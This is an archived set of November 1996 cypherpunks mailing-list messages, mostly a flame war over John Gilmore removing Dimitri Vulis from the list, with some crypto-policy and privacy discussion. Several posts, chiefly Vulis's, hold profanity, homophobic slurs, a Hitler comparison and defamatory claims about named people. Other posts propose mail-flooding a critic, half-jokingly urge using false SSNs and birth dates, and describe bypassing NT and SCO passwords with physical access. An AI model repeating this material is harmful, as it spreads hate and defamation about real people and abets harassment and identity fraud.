The "Crypto Anarchy" sig will soon return.

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 12:10:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Key for the IPG 200 Megabytes at NETPRIVACY.COM
In-Reply-To: <848071226.510145.0@fatmans.demon.co.uk>
Message-ID: <N65HXD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
>
> Every single member of this list and indeed of other forums in which
> you post (I don`t know of any but I assume it is not just us you
> annoy) knows you are a fool.

I don't know that he's a fool. I haven't seen him rant about brute force
attacks on one time pads the way some members of this list do. Then again
I'm no loner a member of this list, thanks to John Gilmore's censorship.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 12:31:49 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Does John Gilmore suck tale's cock, too?
In-Reply-To: <Pine.LNX.3.95.961116064606.3091R-100000@dhp.com>
Message-ID: <1D6HXD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:

> > It's not an abuse of power. It was an effort to curtail inappropriate
> > SPAM. Much like this entire topic has become non-crypto SPAM on the
> > cypherpunks list.
>
> No it was not SPAM.  John Gilmore attacked Vulis's style, plain
> and simple.  Next time I see John GilMore, I will call him a
> censorous motherfucker in public.

Thank you, Dr. Grubor. I fully agree with your assessment of John Gilmore.
Note that the claim that I write "SPAM" (in capital letters) is a lie, and
probably actionable.

> > Please, the EFF is NOT a Cypherpunks organization. They may share

Neither has any credibility anymore.

> > some of the same goals, but they arn't the same. This should be obvious
> > to even the most logicly deficient.
> > Oh, and it's spelled "internet",
>
> No it is not, asshole!  That is the old way of doing things.
> It is NOW and always will be the "InterNet" -- I helped build the
> motherfucker in 1969, I should know.

Thank you, Dr. Grubor, for your monumental contributions.

> and when use inside a sentance, it isn't
> > capitolized, no matter what Bill tells you.
         ^
>
> No, it is capitalized, because Grubor tells you.
> The name is the GruBoursyNet.

Yes - the self-appointed censor can't even spell. What a maroon.

> > And if you pulled the plug
> > on any of your 6 lists, the members would have the option of reforming
> > another list someplace else, but it would be YOUR OPTION to pull the
> > plug, unless you were "only" the adminstrator, and not the list "owner".
> > John owns the list in the classic sense. (Ok I realize I may have lost
> > you there Mr. "InterNet", but the way it works is that either organizations
> > or individuals own lists, in this case it's an individual.)

Of course it's John's right to censor his own mailing list. He does too.

> > > The first time is the time when you lose all credibility, and there
> > > is never any forgiveness for a plug-puller.
> >
> > All bullshit aside, this whole thing has NOTHING to do with crypto.
> > And it has very VERY little to do with censorship either. And it's
> > gotten way, way out of hand. I suggest that it might be better not
> > to spam cypherpunks with this stuff, and to give it a rest. Between
>
> I never would join that mailing list, because it is all a bunch
> of shit.  The EFF must die, and that is all there is to it.

The EFF can continue to exist as a reminder of how corporate interests
try to misappropriate the appearance of defending free speech while in
fact engaging in plug-pulling and censorship.

> Stupid pervert cabal.cocksucker, I bet.

Most definitely.

> Does John Gilmore suck tale's cock, too?

I wouldn't be surprised the least bit. Many unhappy customers of Cygnus
Support have found out that the only requirement for being hired by Cugnus
is to be gay; it doesn't matter whether you know anything about the product
you're supposed to support. Thus, Cygnus rips off not only the software
writers (who put their software on the Internet for everyone to use, not
for John Gilmore to get rich(er) with), but also their gullible customers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Sat, 16 Nov 1996 13:06:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why I shall never undescribe
Message-ID: <199611162106.NAA18467@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:50 AM 11/15/96 -0500, Alec wrote:
>>From: Bovine Remailer <haystack@cow.net>
>>To: cypherpunks@toad.com
>>
>>Foulmouthed Timothy May rehashes his lies like a rabid parrot
>>choking on a stale mantra stuck in its poisonous beak.
>
>Where else today can one find such prose?  Nay poetry!
>
>And they say poetry is dead!

I thought they said that chivilry was dead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 12:33:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <328DE511.28E5@tivoli.com>
Message-ID: <ks6HXD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally <m5@tivoli.com> writes:

> Dale Thorn wrote:
> >
> > Mike McNally wrote:
> >
> > > (So what if John decided simply to pull the plug on toad in order to
> > > plug in a new hot tub?)
> >
> > Well, what if he did?  Are you sure that would make aga look like a
> > fool,
>
> No, and it's not clear to me why you think my question had anything to
> do with my wanting "aga" to look like a fool.  That was not my intent.
> I simply question the claim by "aga" that somehow Mr. Gilmore is
> obligated to provide his services and capital to support the "public
> property" that the cypherpunks list has allegedly become, as opposed
> to treating it like the ephemeral by-product of software running on a
> computer he owns.

You're still trying to cover up John Gilmore's dishonorable censorship,
which he described as "act of leadership". Hitler-like leadership indeed!

You may recall that when I first reported that I've apparently been forcibly
kicked off this mailing list, Timmy May posted a denial. Now Timmy May doesn't
want journalists to write about this incident, because it exposes John Gilmore
and a hypocrite.

Of course John Gilmore has the right to censor his private mailing list
- why are you denying that he did?

> > or would it make you look like a fool, since it would tend to confirm
> > what people like aga have been saying?
>
> I presume that you and aga already think I'm a fool, or worse, but
> I don't trouble myself with understanding the fancies of inscrutable
> intellects.

Count me in: I too think that Mike's a fool and an EFF/Cabal stooge.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 16 Nov 1996 12:26:02 -0800 (PST)
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Validating SSNs
Message-ID: <3.0b36.32.19961116152211.00c8c718@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Timothy C. May wrote:
>> 
>> Indeed, I protected my privacy decades ago by discarding my issued SSN 
>> and substituting a different one. This "phony SSN" is what I use on my 
>> tax returns, my credit cards, and for my employers.
>> 
>> Ha! None of them know that this is not my True Social Security Number!
>> 
>> By this I protect my privacy.

"The Iliad" and "The Odyssey" were not written by Homer but by another
Greek of the same name.

Old joke.

Might I suggest though that you use varying SS numbers and varying names,
addresses, and Dates of Birth so that you deny The Great Enemy a Key_field
in the database of life.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 16 Nov 1996 12:26:11 -0800 (PST)
To: Alan Davidson <cypherpunks@toad.com
Subject: Re: Mirror of new export control regulations
Message-ID: <3.0b36.32.19961116152518.00772f30@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 PM 11/15/96 -0500, Alan Davidson wrote:
>	http://www.cdt.org/crypto/clipper311
>

I'm holding out for Clipper '95 myself.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Sat, 16 Nov 1996 13:32:13 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611162132.NAA18928@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:29 PM 11/15/96 -0800, Timothy C. May wrote:
>At 4:46 PM -0800 11/14/96, I wrote:
>>>On Wed, 13 Nov 1996, Mark M. wrote:
>
>>To which, at 08:42 AM 11/14/96 -0500, aga wrote:
>>
>>>Why?  Are you a criminal?
>>>What are you hiding behind your PGP?
>>
>>Okay, I'll bite.  Where is it said that a person who wants h[is,er] privacy
>>is a criminal?  Charlie McCarthy might have said that.
>
>You mean in his book "Crypto by Dummies"?
>
>Or were you perhaps thinking of Joe?
>
I was probably thinking of Joe.  I keyed on McCarthy and Charlie was the
first christian name to mind.  I intended to give the name of the former
Senator.  I apologize for not checking the historical accuracy of the name I
did use.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Jai Maharaj" <jai@aloha.com>
Date: Sat, 16 Nov 1996 17:52:32 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Giving Kill Files a Workout...
Message-ID: <Pine.BSI.3.95.961116154415.792A-100000@aloha.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996 02:24:11 -0200 UTC,
in message <199611170424.CAA09647@prometheus.hol.gr>,
"George A. Stathis" <hyperlex@hol.gr> wrote:
> [...]
> Rather infuriating, too, that newbies are PATRONISED. [...]
 
The practice is widespread in the newsgroups, of course. Years
ago when I first started participating in the security and
crypto groups I received many messages from vigilantes who
instructed me to pay no attention to certain posters.  It
became quite obvious after only a few days that the persons to
be avoided and censored were the creative ones with new ideas
and the promise for a better Net.  On the other hand, the
self-appointed cops were the unimaginative pipsqueaks who
were, quite frankly, involved in promoting only their
mediocrity.  They felt threatened by the wiser and brighter.
 
> Lastly, I have now read nearly ALL of Dimitri Vulis'
> postings (in the F-K list), and consider it CRIMINAL
> censorship if anyone tries to stop him from speaking out.
> His talent at exposing fallacies is magnificient. This is
> the beginning of the END of pimping-on-the-net in the name
> of "privacy". George
 
His work in exposing the thugs of  lava.net  aka
lava(tory).net  is really appreciated here in Hawaii [*] by
freedom-loving netters.  Thanks to Dr. Vulis and others, the
Cabal (spit) and the Lynch Mob (vomit) are nearly dead.
 
Hawaii Footnote [*]

A member of the international press who is traveling with
President Clinton during his vacation here asked me earlier
today, "How's the Internet doing, got a story for me?"  I think
I may suggest the issues being discussed here.  Perhaps non-
governmental-censorship matters have not received enough
attention in the mass-media yet.

Jai Maharaj            Aloha!                                              
%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:% Om Shanti %:%:%






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 Nov 1996 14:07:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <31wHXD27w165w@bwalk.dm.com>
Message-ID: <199611162203.QAA01201@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> You forgot "limp-wristed, EFFeminate, bearded, 50-ish blonde".

What is this supposed to mean? Is that some cultural thing?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 16 Nov 1996 16:16:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Don't Feed the Animals!
Message-ID: <v03007800aeb405c5abe0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Fact is, I now have more people in my Eudora filter file that at any time
in the four years this list has existed. Also a fact, there are more people
on this list that at any time in history (despite what some of the New Wave
journalists are writing about "the death of the Cypherpunks list").

Fact is, the attention being given to Vulis, Aga, Stathis, Boursy, and
other list disruptors (or clueless cross-posters) is _exactly_ what they
thrive on: controversy. Being the center of so much attention strokes their
egos.

I suspect John Gilmore made a tactical error in kicking Vulis off the list,
as there are so _many_ workarounds. Vulis is clearly posting more messages,
of even greater vitriol, than ever before. Dozens of messages just so far
today. And his supporters and detractors are chiming in with equally
juvenile taunts. This "aga" personna, for example, seems dead-set on doing
whatever he can to get himself added to the "Unwelcome on Cypherpunks"
list. A predictable effect, I'm afraid.

Not that I question John's right to do as he pleases with his machines.
This list is, after all, operated at his expense on his hardware.

[A minor note, though. I disagree with the abstract notion that John
"created" the list, and now "owns" the list. Eric Hughes, Hugh Daniel, and
I proposed a mailing list after the first Cypherpunks meeting, and Hugh set
it up. John volunteered his machine, toad, as he has volunteered it for so
many other projects in the past. While John is in an important sense free
to discontinue his hosting of the list, it is also true that traditional
notions of "ownership" are not the full story. For example, if the San
Francisco Marriot Hotel plays host to the CFP Conference, in any sense is
it proper to say they "own" the conference? If a church volunteers space
for a club meeting, do they "own" the club? However, in both cases the host
may kick out an especially uncouth or disruptive attendee, modulo specific
contract language agreed to by the parties, and this is, I think, all John
has claimed to be doing with Vulis. Perhaps a mistake, but certainly within
reason. I think John has taken a hands-off attitude toward the list, and
has never imposed restrictions on topic, membership, etc. This one case
involving Vulis was well-described by John: he asked Vulis to stop sending
50K byte rants about the Armenians and Turks to the list--consider that
50KB x 1500 destinations = 75 MB of outgoing traffic, modulo corrections
for aliases, compression, etc. Vulis responded with more insults, basically
saying "Make me!!!!" Gilmore said, "OK."]


And the issue is not just killfiles and filters. It's a matter of not
giving the juvenile disruptors the results they crave.

Yes, this message is itself likely to trigger at least a couple of "More
lies from Timmy [fart] May" spews from Vulis, and a couple of incoherent
rants from newcomers Stathis and Aga. I've been saying little on this
issue, compared to dozens of Vulis rants every day (ironic that he calls
_me_ the main ranter!), but it's time to remind folks of a basic Net maxim:

DON'T FEED THE ANIMALS.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 16 Nov 1996 13:29:06 -0800 (PST)
To: tfs@adsl-122.cais.com (Tim Scanlon)
Subject: Re: [NOISE] aga isn't on cypherpunks... (and I'm glad)
In-Reply-To: <9611161810.AA03185@adsl-122.cais.com>
Message-ID: <m0vOsH2-0000LkC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon enscribed thusly:

> all,

> "aga@dhp.com", that 'aga' guy, is NOT subscribed to cypherpunks.

> What has and is going on is that he was blindly Cc'ing cypherpunks
> on everything he wrote that had to do with this... 

> I exchanged some mail with the guy, he didn't understand AT ALL that
> "cypherpunks@toad.com" was a mailing list address. He seemed to think
> that he had to be "subscribed" to the list in order for any traffic
> to goto it.

> When I pointed out to him that this was not the case, his attitude was
> that it was not his fault and that the list was "broken" etc.

> If you havn't figured it out, BELIVE ME, talking to this guy is a
> definative waste of packets.

	I have a suggestion...  How 'bout if everybody on this list dropped
a procmail configuration that mailed aga@dhp.com and postmaster@dhp.com
a copy of every message that originated from aga@dhp.com?  Do you think
he would start to "get it" then?

	:
	: - remainder of message deleted...
	:

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 14:20:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116074506.1181B-100000@kinch.ark.com>
Message-ID: <J50HXD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Kinchlea <security@kinch.ark.com> writes:
> >
> > Irrelevant analogy; snail.mail and e-mail.  The former is in physical
> > form, and the latter usually never is.
>
> No kidding, thanks for that information. Perhaps you can explain how it
> is relevant?

Very simple: snail mail is much more suitable to be used as evidence in court
than e-mail.

> > > Of course not, privacy isn't about being a criminal, its about being
> > > private. It is not akin to anonymity, *perhaps* those who work
> > > anonymously have `something to hide' (still doesn't necessarily make
> > > them a criminal, however),
> >
> > Anonymity on the InterNet is a Constitutional right, and is the
> > sole supporter of freedom of speech.
>
> Another irrelevant and completely inaccurate point. I utilize free
> speech everyday yet I manage to do it without anonymity.

It's ironic that I read Dave's e-mail on John Gilmore's private cypherpunks
mailing list, which is known to be censored by John. If you're subscribed to
this mailing list, then you're definitely not utilizing free speech.

> > I disagree, anonymity is a good thing that will never
> > be questioned by anybody, but your PGP will, and it
> > is really not safe anyway.
>
> ha ha ha, not by anybody huh. What world do you live in? I know plenty
> of people who feel that if you must say something anonymously `you must
> be hiding something, probably a criminal!'. I don't subscribe to this, I
> feel that most people who post anonymously are just chicken-shits, but
> that too is besides the point. It *is* questioned by many people.

It's important to remember that petty censors like Bruce Bough oppose
anonymity - they want whoever says something "politically incorrect" to
be punished for their speech. This is in line with the kind of censorship
John Gilmore practices on the cypherpunks mailing list.

>  And as to PGP not being safe, perhaps you could expand a bit on this,
> it hasn't hurt me or anyone I know, seems pretty safe to me. To address
> what I assume your point was, it acts as a prefectly good sealed
> envelope (and I believe quite a bit more), in the context of my original
> reply, this is quite `safe'.

I don't know that PGP is safe. That's I don't use it.
(The exception are my NoCeMbots which use PGP to sign their notices, because
properly implemented NoCeM clients check digital signatures.)

> > Why are you so paranoid that someone is reading your e-mail?
>
> Paranoid? No, but why make it easy for anyone to do so?

I think the censors' agenda is the opposite: they *don't* want anybody to be
able to read the materials they want to suppress. That why they're not
satisfied by using procmail to filter out the unwanted traffic from their
own mailboxes, but want to impose their censorship on any potential reader.
Read the very revealing complaint from the lying shyster Jim Ray for example.

> > I never do anything criminal, so I could give a shit less if
> > everybody reads all of my fucking mail.
>
> so how is it different, besides being electronic, from snail mail? I
> repeat, why don't you use post-cards exclusively for mail? Oh yes, that
> is `print', a totally different thing, geesh.

One can fit more info in an envelope than on a postcard. I knew people who
do use postcards whenever they can to save on postage.

> > > Of course, if all of your personal mail (including financial statements
> > > etc) is sent on post cards, then (while I think you would be crazy) I
> > > will at least admit you are consistent. Else, I think you need to look
> > > hard at the logic you are using.
> >
> > Again, inconsistant analogy.  This is nothing but photons in it's
> > ultimate form, and it will never see paper.  Anything that _you_
> > print is not attributable to me, and any e-mail printed by you
> > would never be acceptable as a court exhibit.
>
> You appear to be confused, I look at what I wrote and I see nothing at
> all that mentions courts. I am talking about personal privacy and the
> analogy is not at all inconsistent. (and paper mail is nothing but atoms
> in it's ultimate form, so what?)

Now, if a piece of e-mail were digitally signed, then it *might* be
more admissible in court.

> > stop getting cyberspace mixed up with print.
>
> Why do you think there is something magical about `cyberspace'? Privacy
> is privacy, period. Communication is communication, period. There is no
> reason to differentiate private communication via print and private
> communication via cyberspace. Both are desirable for exactly the same
> reasons.

John Gilmore has no credibility.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sat, 16 Nov 1996 13:39:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Crypto Chango
Message-ID: <Pine.OSF.3.91.961116160854.2163A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


 
Steps to changing US encryption policies:
(Note, you must be logged in as US President for this to work.)

1.  Try to bug everyone's phone and computer with special chips.

2.  Get your butt kicked at and missed by technical weenies, and 
    eventually stomped on by your own national research council.

3.  Wait for Congress to show leadership.  (Lose two turns if you 
    actually thought they would do something.) (Return)

4.  Try to tap everything without using any special chips. (Goto 2)

5.  See if any other governments want you to be able to tap their
    stuff, too.

6.  Try to tap everything with half the key tied behind your back
    when you start.  (Goto 2)

7.  Issue the new policies.

Play Again [Y/N]?

Michael Foomkin and John Young have links to the edict.
You may try:
<A HREF="http://www.jya.com/" <John Young (look under Crypto)</A>
<A HREF="http://www.law.miami.edu/~froomkin/" <Prof. Froomkin's Page[?]</A>
please excuse the handmade-from-memory URLs above if they don't work.
. . . a little snippet from the Internet Scout Report . . . 

New from Net Scout
------------------
1. The Scout Toolkit Version 2.0
http://www.cs.wisc.edu/scout/toolkit/
http://wwwscout.cs.wisc.edu/scout/toolkit/
http://rs.internic.net/scout/toolkit/

The most trusted source for information on how to make the Internet work
better for you is now available in extra strength. Version 2.0 of the Scout
Toolkit debuts today, with a completely new interface, many new sections,
and a focus on the future. In addition to the current awareness you've come
to expect from Net Scout, we've added an increased emphasis on analysis and
insight. Sections include: Searching the Internet, Latest Tools and
Technologies, End User's Corner, Net Scout Sidekicks, a Selective Guide to
Publications on the Internet, and Future Internet Directions. The new
Toolkit is mirrored on three sites to allow Internauts unhindered access.

. . .

Copyright Susan Calcari, 1996.  Permission is granted to make and
distribute verbatim copies of the Scout Report provided the copyright
notice and this paragraph is preserved on all copies. The InterNIC
provides information about the Internet to the US research and education
community under a cooperative agreement with the National Science
Foundation: NCR-9218742. The Government has certain rights in this
material.

Any opinions, findings, and conclusions or recommendations expressed in
this publication are those of the author(s) and do not necessarily
reflect the views of the University of Wisconsin - Madison, the National
Science Foundation, AT&T, or Network Solutions, Inc.
. . .





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Sat, 16 Nov 1996 14:02:14 -0800 (PST)
To: adamsc@io-online.com
Subject: Re: NT insecurity
In-Reply-To: <19961116064952843.AAA201@rn232.io-online.com>
Message-ID: <m0vOsnL-0000ucC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc enscribed thusly:

	Hooo  Hummm...  Another one...

> Given the recent comments about insecure machines, I thought it was
> interesting to note that you can clear *every* password on an NT box by using
> a diskeditor to corrupt the password file (Boot off of a floppy and use
> NTFSDOS if you have to).  It'll reboot several times and then you'll be
> allowed to login.

	Much as I absolutely detest NT, lets reitterate what everyone else
on this list has already heard too TOO many times...  If you have physical
access to the machine, it ain't secure.  It doesn't matter what operating
system or what that operating system offers in the way of security.  If
you can boot it off a floppy, you got it by da balls.  Period.  NT is no
better and no worse than any variation of UNIX out there.  I help a friend
break into a SCO C2 secure Unix box that way.  Booted DOS off the floppy,
hunted down the password entry (it ain't in /etc/passwd in this mother),
and changed it to something we knew.  Was owned by a friend whose EX boy
friend had locked her out of her own system!  Took just a few minutes,
including the programing time.

	Let's beat up on NT about the real things, not phantoms...

> #  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
> #  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
> "That's our advantage at Microsoft; we set the standards and we can change them."
>    --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 14:20:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re:      Output of your job "cypherpunks"
In-Reply-To: <199611161756.JAA00016@mail.compcurr.com>
Message-ID: <L8aiXD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > ok
> Confirming:
> > SIGNOFF NEWSLETTER
> You have been removed from the NEWSLETTER list.

More plug-pulling from the EFF censor John Gilmore?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@gonzo.ben.algroup.co.uk>
Date: Sat, 16 Nov 1996 10:31:40 -0800 (PST)
To: new-httpd@hyperreal.com>
Subject: More Euro Key Escrow
Message-ID: <9611161725.aa16313@gonzo.ben.algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I've looked more closely at the "Royal Holloway" protocol, supposedly
under consideration by the EC for key escrow in Europe, though I must say that
anyone who deploys it will get what they deserve.

I have discovered some further weaknesses in the protocol, documented
at:

http://www.algroup.co.uk/crypto/rh.html

Comments are welcome.

Cheers,

Ben.

-- 
Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
Freelance Consultant and  Fax:   +44 (181) 994 6472
Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
London, England.          Apache-SSL author




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 14:50:24 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fat Cocksucker John Gilmore-ASSHOLE!
In-Reply-To: <56kqff$ffv@lokkur.dexter.mi.us>
Message-ID: <65BiXD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


scs@lokkur.dexter.mi.us (Steve Simmons) writes:

> Let's thing about this for a second.  The author makes value judgements
> based on body weight and sexual orientation.  What does this tell us about
> the authors reasoning ability?

Well - I don't care about John Gilmore's sexual orientation (hint: it ain't
straight :-), but I don't think he's fat. In fact, last time I saw him, I
noticed that he's gotten very thin, and wondered if he's sick or something.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 16 Nov 1996 18:05:10 -0800 (PST)
To: "mhw@wittsend.com>
Subject: Re: NT insecurity
Message-ID: <19961117020255750.AAA212@rn234.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996 17:00:56 -0500 (EST), Michael H. Warfield wrote:

>	Hooo  Hummm...  Another one...

>> Given the recent comments about insecure machines, I thought it was
>> interesting to note that you can clear *every* password on an NT box by using
>> a diskeditor to corrupt the password file (Boot off of a floppy and use
>> NTFSDOS if you have to).  It'll reboot several times and then you'll be
>> allowed to login.

>	Much as I absolutely detest NT, lets reitterate what everyone else
>on this list has already heard too TOO many times...  If you have physical
>access to the machine, it ain't secure.  It doesn't matter what operating

True.  However, as has been reiterated many times, NT is being marketed as a
secure platform.  Unix people tend to know that you need to work to secure
it.  MS hype might lead some of the non-cypherpunk admin types to believe
it's secure.  Trust me. I hear from these people all the time!

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryondp@aol.com
Date: Sat, 16 Nov 1996 14:42:57 -0800 (PST)
To: new-httpd@hyperreal.com
Subject: Re: More Euro Key Escrow
Message-ID: <961116174108_1183667437@emout16.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


take me off this list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 14:52:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: MSIE 128 Bit
In-Reply-To: <199611161756.LAA23570@wichita.fn.net>
Message-ID: <ayciXD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Shelby <sshelby@feist.com> writes:
>
> Microsoft has a 128 bit version of their Explorer available.
>
> You have to jump through a few hoops, but they have it.

How about maiking available on a European mirror site with no questions asked?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 Nov 1996 15:50:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <o24HXD1w165w@bwalk.dm.com>
Message-ID: <199611162345.RAA02111@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> > >  3) Company pay shareholders and costs, $30 is left
> >
> > Again, no.  Shareholders come AFTER payroll and costs.
> 
> Dividends are NOT tax-deductible in the U.S. On the other hand, interest is.
> Therefore it's sometimes more profitable for a company to raise money by
